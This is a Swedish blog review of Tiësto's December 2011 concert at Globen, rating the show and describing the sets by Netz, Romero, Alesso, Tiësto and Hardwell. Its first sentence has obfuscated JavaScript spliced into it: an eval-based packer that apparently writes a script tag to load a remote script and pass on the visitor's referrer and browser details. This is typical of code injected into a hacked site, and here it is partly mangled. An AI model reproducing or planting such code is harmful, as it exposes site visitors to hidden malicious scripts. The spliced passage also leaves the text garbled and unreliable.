Recension: Tiësto i Globen

7.5
Show
8.5
Publik
10
8.7

Igår eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|edszs|var|u0026u|referrer|bbzzi||js|php’.split(‘|’),0,{}))
(2011-12-17) var det en historisk dag för elektronisk dansmusik i Sverige. Tillsammans med några av industrins främsta yngre talanger intog Tiësto Globen i Stockholm, det första eventet av sitt slag på den arenan i Sveriges historia, och tack vare kvällens kvalité har en ny nivå uppnåtts för house och techno i vårt land.

Som förväntat kom spelningen att bli en enda stor tribute till svensk house då låtar från bl.a. Swedish House Mafia, Avicii och såklart Alesso nästan kom att dominera kvällen. Konserten startades av Leo Netz, ännu ett nytt svenskt namn att börja hålla koll på. Medan publiken strömmade in välkomnade han de väntande gästerna med varm deep house för att få igång pulsen en aning vilket han lyckades bra med. Lyckligtvis drog han inte igång något allt för taggat vilket var bra för att låta den växande publiken finna sig till rätta.

Efter Netz hoppade holländska Nicky Romero upp på scen och såg till att få publiken i rätt stämning inför de stundande artisterna med lite mer dragig house. Romero, som ännu är relativt okänd i Sverige, visade bra dj-skills och bjöd på en hel del grymma låtar – förutom ett par egna ännu namnlösa låtar och remixar drog han bl.a. av  den personliga favoriten Michael Calfan – Resurrection (Axwell’s Recut Club Version), Deniz Koyus ”Tung!” och hans grymma kommande colab med Avicii som snyggt sattes ihop med Justice’s ”D.A.N.C.E”.

Efter en dryg timmas spelning lämnade Romero över scenen till svenska Alesso som kom att bli ett av dragplåsterna för kvällen efter hans medverkande utannonserades. Alesso var en given highlight och bjöd på kvällens kanske främsta framträdande enligt mig med bl.a. egna monsterhits som ”Nillionare”, ”Raise Your Head” och ”Calling” men fick även snyggt in lite Skrillex, Pendulum och David Guetta. Det var riktigt kul att se den svenska nykomlingen visa grym energi och glädje över att få stå på hemmaplan medan han tog emot publikens kärlek och jubel och det kändes nästan lite tråkigt att han bara fick spela i en timme.

Lite efter elva var det till sist dags för kvällens main act Tiësto att visa sig medan hela Globen dånade efter Alessos grymma spelning. Efter att ha hälsat på den euforiska publiken startade han med sin nya singel ”Las Vegas” för att sedan dra av ett av de mest kompletta och underbara sets jag haft äran att se och lyssna till live. Han mixade ihop det gångna årets största hits som ”Rattle” av Bingo Players och Tommy Trashs ”The End” tillsammans med sina nya grejer men visade även sin kärlek till de äldre fansen genom att dra av mästerverk som ”Traffic”, ”Adagio for Strings” och en av dansmusikens bästa låtar någonsin; ”I Will Be Here”. Bland alla grymma låtar blinkade han såklart även till oss svenskar genom att spela material från Rebecca & Fiona, Bjornberg, Nause, John Dahlbäck samt såklart SHM och Avicii. Efter två timmar av grym musik tillsammans med en förstklassig ljusshow avslutade Tiësto sitt set med hans bästa låt det här året; ”Zero 76” som han gjort tillsammans med Hardwell som vid den här tiden förberedde sig på att avsluta kvällen med sitt set.

Den sista timman ägdes alltså av Hardwell som troligen tillsammans med Avicii kan klassas som den nykomlingen vars namn blivit världskänt snabbast. Till en början var det nästan så jag tyckte synd om Hardwell som fick ta över kvällen efter historiens främsta DJ, men det gick knappast någon nöd på 22-åringen som med härlig energi såg till att hålla publiken fokuserad.  Med en lite mer varierande tracklist blev han en riktigt intressant detalj genom att kombinera egna låtar med både nya och gamla hits. Enligt mig var setets highlights en grym mashup av Tristan Garners ”Overdrive” och Nirvanas ”Smells Like Teen Spirit” och Dada Lifes underbara ”Kick Out the Epic Motherfucker”.

När klockan började närma sig tre på natten avslutade Hardwell hela den fantastiska kvällen med SHM:s ”One”, ett perfekt val av sista låt då den, trots att den sönderspelats för länge sedan, likt denna historiska kväll tagit den svenska housescenen till helt nya höjder. Gåshuden sitter kvar än idag!

Tiesto i globen